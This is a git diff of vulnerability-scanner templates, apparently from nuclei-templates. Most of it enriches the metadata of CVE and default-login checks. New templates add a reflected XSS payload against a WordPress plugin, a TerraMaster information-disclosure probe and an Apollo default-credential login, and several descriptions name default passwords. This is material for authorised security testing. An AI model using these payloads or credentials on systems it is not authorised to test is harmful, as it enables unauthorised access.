name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
name: PuneethReddyHC action.php SQL Injection
author: daffainfo
severity: high
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41648
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41648
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

11
cves/2021/CVE-2021-41649.yaml
View File

@ -1,11 +1,14 @@
id: CVE-2021-41649
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
author: daffainfo
severity: critical
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41649
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41649
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -37,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

5
cves/2021/CVE-2021-4191.yaml
View File

@ -4,10 +4,11 @@ info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
@ -47,3 +48,5 @@ requests:
- type: json
json:
- '.data.users.nodes[].username'
# Enhanced by mp on 2022/03/07

3
cves/2021/CVE-2021-44521.yaml
View File

@ -8,6 +8,7 @@ info:
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
- https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
@ -54,3 +55,5 @@ network:
part: raw
words:
- "123123"
# Enhanced by mp on 2022/03/07

37
cves/2022/CVE-2022-0381.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2022-0381
info:
name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS
author: edoardottt
severity: medium
description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0381
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0381
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381
tags: cve,cve2022,swagger,xss,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "url: \"xss://\"-alert(document.domain)"

4
cves/2022/CVE-2022-0692.yaml
View File

@ -4,7 +4,7 @@ info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1."
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
@ -25,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08

7
cves/2022/CVE-2022-21371.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2022-21371
info:
name: Oracle WebLogic Server LFI
name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
@ -45,3 +46,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/08

6
cves/2022/CVE-2022-22536.yaml
View File

@ -4,13 +4,13 @@ info:
name: SAP Memory Pipes (MPI) Desynchronization
author: pdteam
severity: critical
description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
tags: cve,cve2022,sap,smuggling
tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
@ -57,3 +57,5 @@ requests:
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
condition: or
# Enhanced by mp on 2022/03/08

7
cves/2022/CVE-2022-22947.yaml
View File

@ -4,13 +4,16 @@ info:
name: Spring Cloud Gateway Code Injection
author: pdteam
severity: critical
description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22947
- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- https://github.com/wdahlenburg/spring-gateway-demo
- https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
- https://tanzu.vmware.com/security/cve-2022-22947
tags: cve,cve2022,apache,spring,vmware,actuator,oast
classification:
cve-id: CVE-2022-22947
requests:
- raw:
@ -75,3 +78,5 @@ requests:
part: interactsh_protocol
words:
- "dns"
# Enhanced by mp on 2022/03/08

3
cves/2022/CVE-2022-23131.yaml
View File

@ -5,6 +5,7 @@ info:
author: For3stCo1d
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
reference:
- https://support.zabbix.com/browse/ZBX-20350
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
@ -39,4 +40,4 @@ requests:
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/03/08

6
cves/2022/CVE-2022-23134.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-23134
info:
name: Zabbix Setup Configuration - Unauthenticated Access
name: Zabbix Setup Configuration Authentication Bypass
author: bananabr
severity: medium
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/08

24
cves/2022/CVE-2022-23779.yaml
View File

@ -12,6 +12,11 @@ info:
metadata:
fofa-query: app="ZOHO-ManageEngine-Desktop"
tags: cve,cve2022,zoho,exposure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2022-23779
cwe-id: CWE-200
requests:
- method: GET
@ -31,13 +36,24 @@ requests:
- 'text/html'
condition: and
- type: dsl
dsl:
- '!contains(location,host)'
- type: word
part: location
words:
- '{{Host}}'
negative: true
- type: word
words:
- '<center><h1>301 Moved Permanently</h1></center>'
- type: regex
part: location
regex:
- 'https?:\/\/(.*):'
extractors:
- type: regex
part: header
part: location
group: 1
regex:
- 'https?:\/\/(.*):'

4
cves/2022/CVE-2022-23808.yaml
View File

@ -4,7 +4,7 @@ info:
name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
author: cckuailong
severity: medium
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
reference:
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
@ -39,4 +39,4 @@ requests:
words:
- "\">'><script>alert(document.domain)</script>"
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/03/08

9
cves/2022/CVE-2022-23944.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2022-23944
info:
name: ShenYu Admin Unauth Access
name: Apache ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1."
remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462/files
- https://github.com/apache/incubator-shenyu/pull/2462
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/08

7
cves/2022/CVE-2022-24112.yaml
View File

@ -1,8 +1,9 @@
id: CVE-2022-24112
info:
name: Apache APISIX apisix/batch-requests RCE
description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
name: Apache APISIX apisix/batch-requests Remote Code Execution
description: "A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed."
remediation: "Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`)."
author: Mr-xn
severity: critical
reference:
@ -75,3 +76,5 @@ requests:
group: 1
regex:
- 'GET \/([a-z-]+) HTTP'
# Enhanced by mp on 2022/03/08

7
cves/2022/CVE-2022-24124.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2022-24124
info:
name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/08

4
cves/2022/CVE-2022-24260.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-24260
info:
name: VoipMonitor - Pre-Auth SQL injection
name: VoipMonitor - Pre-Auth SQL Injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
@ -45,3 +45,5 @@ requests:
- type: kval
kval:
- PHPSESSID
# Enhanced by mp on 2022/03/08

41
cves/2022/CVE-2022-24990.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-24990
info:
name: TerraMaster TOS < 4.2.30 - Server Information Disclosure
author: dwisiswant0
severity: medium
description: |
TerraMaster NAS devices running TOS prior to version
4.2.30 is vulnerable to information disclosure
reference: https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
metadata:
shodan-query: TerraMaster
tags: cve,cve2022,terramaster,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/module/api.php?mobile/webNasIPS"
headers:
User-Agent: "TNAS"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- "TerraMaster"
condition: and
- type: regex
part: body
regex:
- "webNasIPS successful"
- "(ADDR|(IFC|PWD|[DS]AT)):"
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
condition: or

6
cves/2022/CVE-2022-25323.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-25323
info:
name: ZEROF Web Server 2.0 XSS
name: ZEROF Web Server 2.0 Cross-Site Scripting
author: pikpikcu
severity: medium
description: ZEROF Web Server 2.0 allows /admin.back XSS.
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
reference:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
@ -31,3 +31,5 @@ requests:
- type: status
status:
- 401
# Enhanced by mp on 2022/03/07

9
default-logins/UCMDB/ucmdb-default-login.yaml
View File

@ -1,9 +1,14 @@
id: ucmdb-default-login
info:
name: Micro Focus UCMDB Default Login
name: Micro Focus Universal CMDB Default Login
author: dwisiswant0
severity: high
description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
reference:
- https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
classification:
cwe-id: CWE-798
tags: ucmdb,default-login
requests:
@ -31,3 +36,5 @@ requests:
part: header
words:
- "LWSSO_COOKIE_KEY"
# Enhanced by mp on 2022/03/07

7
default-logins/abb/cs141-default-login.yaml
View File

@ -1,13 +1,16 @@
id: cs141-default-login
info:
name: CS141 SNMP Module Default Login
name: UPS Adapter CS141 SNMP Module Default Login
author: socketz
severity: medium
description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
metadata:
shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
classification:
cwe-id: CWE-798
requests:
- raw:
@ -48,3 +51,5 @@ requests:
- type: kval
kval:
- accessToken
# Enhanced by mp on 2022/03/07

4
default-logins/activemq/activemq-default-login.yaml
View File

@ -4,6 +4,8 @@ info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
description: Apache ActiveMQ default login information was discovered.
reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
requests:
@ -27,3 +29,5 @@ requests:
- 'Welcome to the Apache ActiveMQ Console of <b>'
- '<h2>Broker</h2>'
condition: and
# Enhanced by mp on 2022/03/07

7
default-logins/apache/tomcat-default-login.yaml
View File

@ -1,8 +1,11 @@
id: tomcat-default-login
info:
name: Tomcat Manager Default Login
name: ApahceTomcat Manager Default Login
author: pdteam
description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
severity: high
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
tags: tomcat,apache,default-login
requests:
@ -64,3 +67,5 @@ requests:
- type: word
words:
- Apache Tomcat
# Enhanced by mp on 2022/03/03

49
default-logins/apollo/apollo-default-login.yaml Normal file
View File

@ -0,0 +1,49 @@
id: apollo-default-login
info:
name: Apollo Default Login
author: PaperPen
severity: high
metadata:
shodan-query: http.favicon.hash:11794165
reference: https://github.com/apolloconfig/apollo
tags: apollo,default-login
requests:
- raw:
- |
POST /signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/signin?
username={{user}}&password={{pass}}&login-submit=Login
- |
GET /user HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
user:
- apollo
pass:
- admin
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"userId":'
- '"email":'
condition: or
- type: dsl
dsl:
- "status_code_1 == 302 && status_code_2 == 200"
- "contains(tolower(all_headers_2), 'application/json')"
condition: and

6
default-logins/azkaban/azkaban-default-login.yaml
View File

@ -9,7 +9,7 @@ info:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
cwe-id: 255
cwe-id: CWE-798
requests:
- raw:
@ -50,6 +50,4 @@ requests:
kval:
- azkaban.browser.session.id
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/03

4
default-logins/chinaunicom/chinaunicom-default-login.yaml
View File

@ -7,7 +7,7 @@ info:
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login
classification:
cwe-id: 798
cwe-id: CWE-798
requests:
- raw:
@ -35,4 +35,4 @@ requests:
- "/menu.gch"
part: header
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/03

6
default-logins/cobbler/cobbler-default-login.yaml
View File

@ -3,7 +3,7 @@ id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
@ -11,7 +11,7 @@ info:
severity: high
tags: cobbler,default-login,api
classification:
cwe-id: cwe-798
cwe-id: CWE-798
requests:
- raw:
@ -69,4 +69,4 @@ requests:
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/03

4
default-logins/dell/dell-idrac-default-login.yaml
View File

@ -9,7 +9,7 @@ info:
- https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
tags: dell,idrac,default-login
classification:
cwe-id: 798
cwe-id: CWE-798
requests:
- raw:
@ -41,4 +41,4 @@ requests:
words:
- '<authResult>0</authResult>'
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/03

4
default-logins/dell/dell-idrac9-default-login.yaml
View File

@ -9,7 +9,7 @@ info:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
tags: dell,idrac,default-login
classification:
cwe-id: 798
cwe-id: cwe-798
requests:
- raw:
@ -39,4 +39,4 @@ requests:
words:
- '"authResult":0'
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/03

7
default-logins/dell/emcecom-default-login.yaml
View File

@ -4,9 +4,12 @@ info:
name: Dell EMC ECOM Default Login
author: Techryptic (@Tech)
severity: high
description: Default Login of admin:#1Password on Dell EMC ECOM application.
description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
classification:
cwe-id: CWE-798
requests:
- raw:
@ -36,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/03

7
default-logins/druid/druid-default-login.yaml
View File

@ -1,10 +1,13 @@
id: druid-default-login
info:
name: Druid Default Login
name: Apache Druid Default Login
author: pikpikcu
severity: high
description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
classification:
cwe-id: CWE-798
requests:
- raw:
@ -37,3 +40,5 @@ requests:
- type: regex
regex:
- "^success$"
# Enhanced by mp on 2022/03/03

8
default-logins/dvwa/dvwa-default-login.yaml
View File

@ -1,9 +1,15 @@
id: dvwa-default-login
info:
name: DVWA Default Login
author: pdteam
severity: critical
description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
tags: dvwa,default-login
reference:
- https://opensourcelibs.com/lib/dvwa
classification:
cwe-id: CWE-798
requests:
- raw:
@ -50,3 +56,5 @@ requests:
- type: word
words:
- "You have logged in as 'admin'"
# Enhanced by mp on 2022/03/03

5
default-logins/exacqvision/exacqvision-default-login.yaml
View File

@ -4,8 +4,11 @@ info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
classification:
cwe-id: cwe-798
requests:
- raw:
@ -41,3 +44,5 @@ requests:
words:
- '"auth":'
- '"success": true'
# Enhanced by mp on 2022/03/03

7
default-logins/flir/flir-default-login.yaml
View File

@ -4,7 +4,12 @@ info:
name: Flir Default Login
author: pikpikcu
severity: medium
description: Flir default login credentials (admin/admin) were discovered.
reference:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
classification:
cwe-id: CWE-798
requests:
- raw:
@ -41,3 +46,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/03

7
default-logins/frps/frp-default-login.yaml
View File

@ -1,11 +1,14 @@
id: frp-default-login
info:
name: Frp Default Login
name: FRP Default Login
author: pikpikcu
severity: high
description: FRP default login credentials were discovered.
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
classification:
cwe-id: CWE-798
requests:
- raw:
@ -33,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/03

7
default-logins/gitlab/gitlab-weak-login.yaml
View File

@ -1,15 +1,18 @@
id: gitlab-weak-login
info:
name: Gitlab Weak Login
name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
description: Gitlab default login credentials were discovered.
tags: gitlab,default-login
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
metadata:
shodan-query: http.title:"GitLab"
classification:
cwe-id: CWE-798
requests:
- raw:
@ -51,3 +54,5 @@ requests:
- '"token_type":'
- '"refresh_token":'
condition: and
# Enhanced by mp on 2022/03/03

6
default-logins/glpi/glpi-default-login.yaml
View File

@ -5,8 +5,10 @@ info:
author: andysvints
severity: high
tags: glpi,default-login
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
classification:
cwe-id: CWE-798
requests:
- raw:
@ -65,3 +67,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/03

17
default-logins/google/google-earth-dlogin.yaml
View File

@ -4,10 +4,21 @@ info:
name: Google Earth Enterprise Default Login
author: orpheus,johnjhacking
severity: high
tags: default-login,google
reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
description: Google Earth Enterprise default login credentials were discovered.
remediation: "To reset the username and password:
sudo /opt/google/gehttpd/bin/htpasswd -c
/opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
tags: default-login,google-earth
reference:
- https://johnjhacking.com/blog/gee-exploitation/
- https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
metadata:
shodan-query: 'title:"GEE Server"'
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,3 +46,5 @@ requests:
words:
- 'DashboardPanel'
- 'Earth Enterprise Server'
# Enhanced by mp on 2022/03/10

12
default-logins/gophish/gophish-default-login.yaml
View File

@ -1,10 +1,18 @@
id: gophish-default-login
info:
name: Gophish < v0.10.1 default credentials
name: Gophish < v0.10.1 Default Credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.
reference:
- https://docs.getgophish.com/user-guide/getting-started
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -44,3 +52,5 @@ requests:
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
condition: and
# Enhanced by mp on 2022/03/10

8
default-logins/grafana/grafana-default-login.yaml
View File

@ -5,10 +5,16 @@ info:
author: pdteam
severity: high
tags: grafana,default-login
description: Grafana default admin login credentials were detected.
reference:
- https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -46,3 +52,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

10
default-logins/guacamole/guacamole-default-login.yaml
View File

@ -5,7 +5,13 @@ info:
author: r3dg33k
severity: high
tags: guacamole,default-login
